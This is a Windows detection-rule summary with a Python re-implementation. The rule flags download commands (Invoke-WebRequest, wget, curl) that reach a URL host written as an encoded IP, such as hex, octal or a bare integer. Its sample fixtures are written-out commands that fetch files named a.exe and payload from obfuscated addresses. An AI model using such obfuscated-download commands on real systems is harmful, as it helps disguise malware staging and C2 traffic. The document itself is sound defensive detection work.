
Summary
This detection rule identifies Windows processes that use an obfuscated or encoded IP address in a URL together with a download command. It looks for command lines that invoke common download utilities such as 'Invoke-WebRequest', 'wget', or 'curl' combined with encoded forms of an IP address (e.g., hexadecimal, octal). The detection is built from several selections: one matching the download commands, others matching the encoded-IP variants in the command line, and a filter matching well-formed IP address formats so that ordinary dotted-decimal addresses do not trigger it. The rule's condition requires that at least one encoded-IP selection matches while the valid-IP filter does not. Downloads that hide the destination behind an encoded IP are a common sign of malware or external command and control (C2) communication, and this approach surfaces them without alerting on plainly written addresses.
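To make the logic concrete, here is an added example (written for this summary, not the rule's own query) that re-implements the same idea in Python: find a download utility in the command line, extract the host of every `://` URL, discard hosts that are strict dotted-decimal IPv4 addresses, and report the rest when they decode as an inet_aton-style numeric address (hex, octal, decimal, or a mix). The utility list, regexes, and the constructed sample command lines are this example's assumptions, not values taken from the rule; the decoding follows inet_aton conventions so an analyst also sees the real destination address.

```python
"""Detect download commands whose URL host is an encoded IP address.

Added example that re-implements the detection idea (download utility +
encoded IP in a URL, minus well-formed dotted-decimal IPs); it is not the
rule's own query.
"""
import re
from typing import Optional

# Download utilities named in the rule summary (assumed list for this example).
DOWNLOAD_UTILITY_RE = re.compile(r"\b(Invoke-WebRequest|wget|curl)\b", re.I)

# Host portion of any scheme://host[:port][/path] found in the command line.
URL_HOST_RE = re.compile(r"://([^\s/:?#'\"\\]+)")

# Strict dotted-decimal IPv4: four octets 0-255, no leading zeros (the "valid IP" filter).
VALID_IPV4_RE = re.compile(
    r"^(?:(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)\.){3}(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)$"
)


def _parse_part(part: str) -> int:
    """Parse one dotted component the way inet_aton does: 0x.. hex, 0.. octal, else decimal."""
    if part.lower().startswith("0x"):
        return int(part[2:], 16)  # int("", 16) raises ValueError for a bare "0x"
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def decode_host(host: str) -> Optional[str]:
    """Return the dotted-decimal form of an inet_aton-style numeric host, or None."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        values = [_parse_part(p) for p in parts]
    except ValueError:
        return None  # not numeric at all, e.g. a hostname
    # inet_aton semantics: each leading part is one byte, the last part fills
    # the remaining bytes (1 part = 32 bits, 2 parts = 8 + 24 bits, ...).
    last_width = 4 - (len(values) - 1)
    if any(v > 0xFF for v in values[:-1]) or values[-1] >= 256 ** last_width:
        return None
    n = 0
    for v in values[:-1]:
        n = (n << 8) | v
    n = (n << (8 * last_width)) | values[-1]
    return ".".join(str((n >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def classify_host(host: str) -> Optional[str]:
    """Label an encoded host as hex/octal/decimal/mixed; None for hostnames and valid IPs."""
    if VALID_IPV4_RE.match(host) or decode_host(host) is None:
        return None
    parts = host.split(".")
    has_hex = any(p.lower().startswith("0x") for p in parts)
    has_octal = any(len(p) > 1 and p[0] == "0" and not p.lower().startswith("0x") for p in parts)
    if has_hex and has_octal:
        return "mixed"
    if has_hex:
        return "hex"
    if has_octal:
        return "octal"
    return "decimal"  # a single 32-bit integer or a short dotted form without leading zeros


def detect(cmdline: str) -> list:
    """Return one finding per encoded-IP URL host in a download command; [] otherwise."""
    utility = DOWNLOAD_UTILITY_RE.search(cmdline)
    if not utility:
        return []
    findings = []
    for host in URL_HOST_RE.findall(cmdline):
        kind = classify_host(host)
        if kind is not None:
            findings.append({"utility": utility.group(1), "host": host,
                             "kind": kind, "decoded": decode_host(host)})
    return findings


# Constructed sample command lines for this example (not real telemetry).
SAMPLE_COMMAND_LINES = [
    'powershell -c "Invoke-WebRequest http://0x7f000001/a.exe -OutFile a.exe"',
    "curl.exe http://0177.0.0.1/payload",
    "wget http://2130706433/x",
    "curl http://0x7f.0x0.0x0.0x1:8080/",
    "curl http://192.168.1.10/update.bin",   # plain IP: filtered out
    "notepad.exe http://0x7f000001/",        # no download utility: ignored
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(line, "->", detect(line) or "no alert")
```

The valid-IP filter is what keeps ordinary `curl http://192.168.1.10/...` quiet; everything that survives it and still decodes is reported with its decoded address, so the analyst can pivot on the real destination rather than on the obfuscated string.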
Categories
- Windows
- Endpoint
Data Sources
- Process
Created: 2022-08-03